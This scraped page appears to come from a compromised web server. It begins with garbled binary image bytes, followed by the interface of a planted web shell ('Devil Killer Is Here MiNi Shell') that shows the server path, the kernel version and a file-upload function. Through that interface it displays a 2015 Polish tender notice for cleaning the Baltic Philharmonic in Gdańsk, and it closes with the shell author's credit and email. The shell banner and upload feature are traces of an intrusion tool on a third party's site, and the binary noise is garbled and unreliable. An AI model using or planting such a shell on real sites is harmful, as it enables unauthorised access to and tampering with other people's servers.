JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150526/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150526/75717-N-2015.html

<p class="kh_header"><b>Gdańsk: Sprzątanie pomieszczeń oraz terenu wokół Polskiej Filharmonii Bałtyckiej im. Fryderyka Chopina w Gdańsku</b><br>
<b>Numer ogłoszenia: 75717 - 2015; data zamieszczenia: 26.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Polska Filharmonia Bałtycka im. Fryderyka Chopina w Gdańsku , ul. Ołowianka 1, 80-751 Gdańsk, woj. pomorskie, tel. (058) 3206250, faks (058) 323 83 63.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.filharmonia.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzątanie pomieszczeń oraz terenu wokół Polskiej Filharmonii Bałtyckiej im. Fryderyka Chopina w Gdańsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis zamówienia

1.	Sprzątanie pomieszczeń Zamawiającego t.j. przygotowanie pomieszczeń  na przyjście widzów, gości, zgodnie z harmonogramem miesięcznym na dany miesiąc przygotowanym przez Zamawiającego, 

2.	Uprzątanie terenu zewnętrznego  przed wejściem głównym, wejściem od strony Recepcji, wejściem do budynku zaplecza technicznego, wokół Kasy Biletowej  zgodnie z harmonogramem Zamawiającego, 

3.	Poniższy zakres zadań i ich zakres czynności należy wykonać przy każdorazowym zleceniu przez Zamawiającego zgodnie z harmonogramem, 
w którym są   wskazane pomieszczenia do sprzątania w danym dniu miesiąca  

     I. Zadania i ich zakres:

Usługa dotyczy następujących pomieszczeń i zadań:

A. Pomieszczenia budynku głównego: sale koncertowe, estrada, widownia, śluzy, loże, balkony, przynależne pomieszczenia techniczne

- czyszczenie i konserwacja foteli drewnianych tapicerowanych materiałem  (podłokietniki, oparcia, siedziska ) 
- czyszczenie twardych powierzchni podłóg (zapoznanie się z rodzajem materiału, 
z którego wykonano podłogi i stosowanie instrukcji czyszczenia i konserwacji danej nawierzchni zgodnie z zaleceniami producenta danej podłogi ) szczególnie dotyczy to podłóg wyłożonych marmurem i posadzkami drewnianymi, 
- czyszczenie i konserwacja innych powierzchni płaskich np. parapety, szafki hydrantowe, lady w szatni oraz inne elementy metalowe i szklane wyposażenia 
- usuwanie pajęczyn ze ścian i sufitów, 
- mycie balustrad,
- czyszczenie, konserwacja, zewnętrznych powierzchni mebli drewnianych, drzwi
szyldów drzwiowych, klamek, uchwytów i innych elementów związanych 
z galanterią meblową, ściereczkami dostosowanymi do danego rodzaju powierzchni,


      B. Pomieszczenia budynku głównego: wiatrołap, foyer, szatnie, holle wejściowe, windy, sala bufetowa wraz z zapleczem  i pomieszczenia   pomocnicze

- odkurzanie, czyszczenie, mycie wycieraczek,
- usuwanie pajęczyn ze ścian i sufitów, 
-  mycie balustrad,
- maszynowe doczyszczanie twardych powierzchni podłóg   (zapoznanie się 
z rodzajem materiału z którego wykonano podłogi i stosowanie instrukcji czyszczenia i konserwacji zgodnie z instrukcją producenta podłogi) co najmniej raz na 2 tygodnie , szczególnie dotyczy to podłóg wyłożonych marmurem. W przypadku pielęgnacji posadzek marmurowych na dolnym 
i górnym Foyer należy stosować środki, preparaty powodujące ich nabłyszczenie- powinny posiadać właściwości antypoślizgowe (w załączeniu karta charakterystyki produktu)  po każdorazowym ich umyciu aby nie powodowały zmatowienia powierzchni poziomych posadzek  
- opróżnianie koszy, odkurzanie, przecieranie na wilgotno, wymiana wkładów 
z worków foliowych dostosowanych do wielkości kosza na śmieci  wraz 
z zachowaniem segregacji papieru, szkła, tworzywa sztucznego 
- czyszczenie na wilgotno zewnętrznych powierzchni mebli, poręczy, balustrad, metaloplastyki ściereczkami przystosowanymi do danej powierzchni, 
- czyszczenie i konserwacja innych powierzchni płaskich np. parapety, wraz 
z zlewozmywakami i szafkami do zlewozmywaków, lady w szatni, oraz inne elementy metalowe i szklane wyposażenia
- mycie szyb wiatrołapów, windy  i innych powierzchni szklanych środkami 
i ściereczkami przystosowanymi do konserwacji powierzchni szklanych 

C. Pomieszczenia sanitarne w obiekcie Filharmonii budynku głównego i zaplecza  technicznego: łazienki - toaleta damska i męska (WC)

- mycie wszystkich urządzeń sanitarnych (armatura, wyposażenie sanitariatów), pojemniki na odpadki, deski sedesowe, sedesy, uchwyty na papier, do bieżącej higieny  muszli - szczotki sedesowe wraz z pojemnikiem itp.
- mycie powierzchni podłóg (zapoznanie się z rodzajem materiału z którego wykonano podłogi i stosowanie instrukcji czyszczenia i konserwacji producenta podłogi lub środków niezbędnych do prawidłowego utrzymania czystości tych powierzchni) szczególnie dotyczy to podłóg wyłożonych marmurem 
- opróżnianie pojemników na śmieci wraz z ich segregacją , wymiana worków 
z PCV 
- czyszczenie na wilgotno pojemników na materiały eksploatacyjne suszarki do rąk, pojemniki na papier, pojemniki na szczotki inne elementy wyposażenia łazienek lub kabin sanitarnych, oraz inne elementy metalowe i szklane wyposażenia, 
- czyszczenie i konserwacja innych powierzchni płaskich np. parapety 
- wyposażanie (ewentualnie uzupełnianie) łazienek kompleksowo w dostarczane przez wykonawcę  środki higieny tj. mydła, papier toaletowy ręczniki papierowe do rąk - standardowo używane w instytucjach kultury.
- mycie luster, powierzchni pionowych (glazura),
- mycie drzwi , obudowy kabiny sanitarnej, galanterii drzwiowej w tym klamki 
i szyldy ,    środkami zaleconymi przez producenta, 
- mycie powłok ceramicznych na ścianach,
- usuwanie pajęczyn ze ścian i sufitów wraz z systematycznym utrzymaniem czystości kratek wentylacyjnych i opraw sufitowych,

   D. Sprzątanie wraz z zamiataniem  terenu przed wejściem głównym, wejściem od strony Recepcji, wejściem do budynku zaplecza technicznego i przed budynkiem kasy (c.a. 400,00 m2) z liści, śmieci, innych nieczystości  itp., oczyszczenie koszy na śmieci ,  popielniczek itp..

   E. W czasie koncertów/imprez dyżur jednego lub dwóch pracowników  w zależności od zlecenia Zamawiającego  celem utrzymania ciągłości czystości w obiektach Filharmonii.

   F. Pomieszczenia budynku zaplecza technicznego: holle i korytarze, pomieszczenia   techniczne, garderoby, sale konferencyjne, pomieszczenia VIP 

- czyszczenie podłóg,
- opróżnianie koszy na śmieci i wynoszenie śmieci do wskazanego przez 
            Zamawiającego kontenera,
- szczenie drzwi,
- usuwanie pajęczyn,
- czyszczenie powierzchni grzejników,
- czyszczenie parapetów,
- mycie okien (nie rzadziej niż 1 raz na pół roku, w razie konieczności częściej),
- czyszczenie balustrad,

    II. Przekazywanie wykonanych robót :

Do każdorazowego przekazywania - odbioru  zleconych robót zgodnie 
z przekazanym harmonogramem robót określającym datę i  godzinę gotowości sprzątnięcia danego obszaru  Zamawiający wymaga aby ze strony Wykonawcy była powołana osoba koordynatora robót, który miałby miedzy innymi za zadanie 
w terminach i czasie wskazanym harmonogramem na  przygotowanie danego obszaru do gotowości jak również dysponowanie pracownikami Wykonawcy 
w przypadku poprawienia wykonanych i nie odebranych robót. 
Koordynator przyjmowałby uwagi i zlecenia od Zamawiającego  z ramienia Wykonawcy oraz inne czynności związane z przedmiotem zamówienia.  


III. Wydarzenia artystyczne 
a.	koncerty symfoniczne: od 3 do 6 razy w miesiącu (w tym koncert sylwestrowy i noworoczny)
b.	koncerty kameralne: od 5 do 10 razy w miesiącu 
c.	koncerty inne: około od 2 do 5 razy w miesiącu
d.	imprezy inne: około od 4 do 16 razy w miesiącu
  Każda z wyżej wymienionych imprez, koncertów może być z cateringiem lub bez cateringu .

Szczegółowe zestawienie powierzchni do sprzątania  w [ m 2 ]

 ( symbole np.A1-01 - oznacza nr pomieszczenia wg projektu budowlanego, 
201,60 m2  - oznacza powierzchnie pomieszczenia, Estrada - nazwa  )


- Powierzchnie w budynku głównym obiektu Filharmonii:

Sala Koncertowa 
A1-01 Estrada     201,60m2                                                    

A1-02 Widownia   214,90m2                                                
A2-16 Widownia    370,63m2                                                

A1-04 Śluza          4,40m2                                                            
A1-07 Śluza          4,40m2                                                            
A1-09 Śluza          5,90m2                                                             

A1-41 Śluza          4,90m2
A2-02 Śluza          7,27m2
A2-04 Śluza          6,96m2
A2-06 Śluza          3,24m2                                                            

A2-07 2,27m2
A2-09 2,27m2
A2-10 3,24 m2
A2-12 7,05m2                                                                    

A2-19 7,27m2                                                                      

A2-05 Loże 10,73m2
A2-11 10,74m2                                                                   

A2-03 Balkony 41,26m2
A2-08 37,06m2                                                                  
                                                               
WC
A1-57 5,40m2
A1-54 7,00m2
A1-55 11,10m2
A1-52 11,80m2
A1-53 11,80m2            
A1-49 10,90m2
A1-50 24,00m2
A1-47 14,80m2
A1-48 30,40m2       


A1-10 16,80m2
A1-11 15,80m2
A1-12 4,40m2      
B2-07 26,6m2
B2-08 31,50



Foyer dolne
A1-39 19,80m2 Wiatrołap                                                
A1-38  157,50m2  Foyer sali koncertowej i zielonej      
A1-13 37,20m2 Szatnia przy pom. 19                             
A1-44 293,20m2  Foyer przy szatniach                           

A1-43 17,00m2
A1-36 19,70m2  Korytarz przy WC pom. 51 i 33              

A1-45 35,90m2
A1- 46 29,60m2  Szatnia                                                  

A1-08 34,10m2  Śluza przy Sali Zielonej                        

A1-15 171,50m2                                                              

A1-37 7,00m2
A1-61 9,20m2
A1-62 20,60m2
A1-63 6,50m2
A1-64 6,60m2 pom. gospodarcze nr 33+BOW            

Winda D2 4,00m2                                                         

A1-14 25,20m2 Szatnia od strony rz. Motławy             

K-7 87m2 Klatka przy windzie na foyer                        

K-1 102,55m2 Klatka przy Motławie                              
       
Foyer górne

A2-13 113,87 m2       Foyer                                                           
A2-14 590,07m2        Foyer                                                            
A2-15 105,65m2        Foyer                                                           

A3-12 73,41m2          Antresola                                                      

C2-01 113,30m2 Sala Bufetowa    plus zaplecze bufetu
C2-02  16,60 m2
C2-03    5,30m2
C2-05   24,30m2
C2-10    2,70 m2
C2-11    4,50 m2
C2-12    6,0 m2
C2-13    3,30 m2
Kl. schodowa K-5  64,29m2
Plus 
C1-03 korytarz  3,80 m2
C1-04 pom. tech. 3,30 m2
C1-01 pom. biurowe 10,90m2
C1-02 pom. biurowe   7,30m2
C2-06 pom. biurowe  13,59m2
C2-07 pom. biurowe    7,98m2
Kl. schodowa K-4        56,22m2
SA1 pom. pod schodami 9,20 m2                                                  
      
Sala dębowa + sala jazzowa

C1-05         113,40m2  Sala dębowa                                                             
C1-09         154,40m2 Sala jazzowa                                                            
A1-51         22,00m2 Korytarze                                                                     
C1-06         60,70 m2 Hall wejściowy                                                               
C1-07         6,30m2 Wiatrołap                                                                      
Winda D-3  4,00m2                

Segment B

B1-15            48,90 m2 hall
B1-16            20,40  m2 przedsionek estrady
B1-17            2,0 m2 przedsionek estrady
B1-18,19       23,20 m2  Toalety
B1-20            38,20 m2 garderoba
B1-21            207,20 m2  sala Kameralna
B-1-23           9,20 m2 śluza
B-1- 24          7,40 m2 korytarz
A1-08            34,10  m2  przedsionek 

Razem powierzchnia do sprzątania  4.239,82 m2                                                                   

- Powierzchnie w budynku zaplecza technicznego obiektu Filharmonii:

PARTER
Hall wejściowy nr 11Ai 11B                  43,80 m2
RECEPCJA nr 13                                    2,50 m2
Przedsionek korytarza nr 12                    5,40 m2
Klatka schodowa                                     40,12 m2
Winda                                                       2,10 m2
Korytarz przy garderobach nr 10             10,10 m2
Korytarz przy garderobach nr 9               10,20 m2
Garderoba nr 7 z WC                               19,30 m2
Garderoba nr 8 z WC                               25,40 m2
Toaleta dla inwalidów                              4,0 m2
Toaleta damska                                         4,0 m2
Toaleta męska                                           4,0 m2

PIWNICA
Klatka schodowa                                        4,40 m2
Przedsionek przy windzie nr 12                 25,10 m2
       Pomieszczenie nr 04                                   24,50 m2
        Pomieszczenie nr 010                                22,40 m2

I PIĘTRO
Korytarz przy windzie                                        10,15 m2
Pomieszczenie VIP nr 1                                      12,79 m2
Pomieszczenie VIP nr 2                                     12,79 m2

II PIĘTRO
Hall nr 202                                                             17,50 m2
Sala Konferencyjna nr 210                                    163,69 m2
Pomieszczenie nr 209                                             6,00 m2
Sala Konferencyjna 204                                         122,20 m2
Wc damskie nr 207                                                 8,50 m2
 Wc męskie nr 206                                                  8,90 m2
Zaplecze sal nr 205                                                12,70 m2
Korytarz nr 203                                                      11,30 m2


Razem powierzchnia do sprzątania 621,05  m2


- Uprzątnięcie terenu przed wejściem głównym, wejściem od strony Recepcji, wejściem do budynku zaplecza technicznego i przed budynkiem kasy z liści i śmieci 

O powierzchni 400,00m2 oraz opróżnienie popielniczek zewnętrznych i koszy zewnętrznych wraz z wymianą worków 


Załączniki:  - Rzut zbiorczy parteru budynku głównego
		    -  Rzut zbiorczy I pietra budynku głównego
                      - Rzut parteru całego obiektu Filharmonii budynku głównego łącznie z
                        częścią biurową
                      - Rzut piwnicy - budynek zaplecza technicznego PFB
                      - Rzut parteru -  budynek zaplecza technicznego PFB   
                            - Rzut 1 piętra - budynek zaplecza technicznego PFB 
                            - Rzut 2 piętra - budynek zaplecza technicznego PFB

Uwaga!

Wraz z ofertą Wykonawca dostarczy wykaz wykonanych usług sprzątania jak opisanych 
w przedmiocie zamówienia, w obiektach kultury t.j. teatrach, operach, filharmoniach, 
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem daty wykonania 
i odbiorców oraz załączeniem dokumentów potwierdzających, że usługi sprzątania zostały wykonane należycie..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art.67 ust.1 pkt 6 Pzp

Zamawiający przewiduje, w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usługi, zamówienia uzupełniające, stanowiące nie więcej niż 50% wartości zamówienia podstawowego, i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 74.73.10.00-2, 74.72.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów załączonych do oferty - na zasadzie: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów załączonych do oferty - na zasadzie: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów załączonych do oferty - na zasadzie: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów załączonych do oferty - na zasadzie: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów załączonych do oferty - na zasadzie: spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Uwaga!

Wraz z ofertą Wykonawca dostarczy wykaz wykonanych usług sprzątania jak opisanych 
w przedmiocie zamówienia, w obiektach kultury t.j. teatrach, operach, filharmoniach, 
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem daty wykonania 
i odbiorców oraz załączeniem dokumentów potwierdzających, że usługi sprzątania zostały wykonane należycie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość dokonywania zmian postanowień zawartej umowy, w szczególności zmiany umowy mogą  dotyczyć :
      1) wynagrodzenia;
      2)  warunków płatności
                   2..   Zmiany, o których mowa w ust. 1  mogą nastąpić w następujących sytuacjach:
                         1)  zmiana wynagrodzenia i warunków płatności może nastąpić w przypadku zmiany stawki podatku od towarów i usług na dzień wystawienia faktury 
w stosunku do stawki obowiązującej w dniu podpisania umowy;
                          2) gdy zmiany są korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.filharmonia.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Polska Filharmonia Bałtycka im. Fryderyka Chopina w Gdańsku ul. Ołowianka 1,  80-751 Gdańsk pokój 108.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.06.2015 godzina 09:00, miejsce: Sekretariat Polskiej Filharmonii Bałtyckiej im. Fryderyka Chopina w Gdańsku ul. Ołowianka 1  80-751 Gdańsk
Uwaga! Obowiązek zgłoszenia się w Recepcji.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com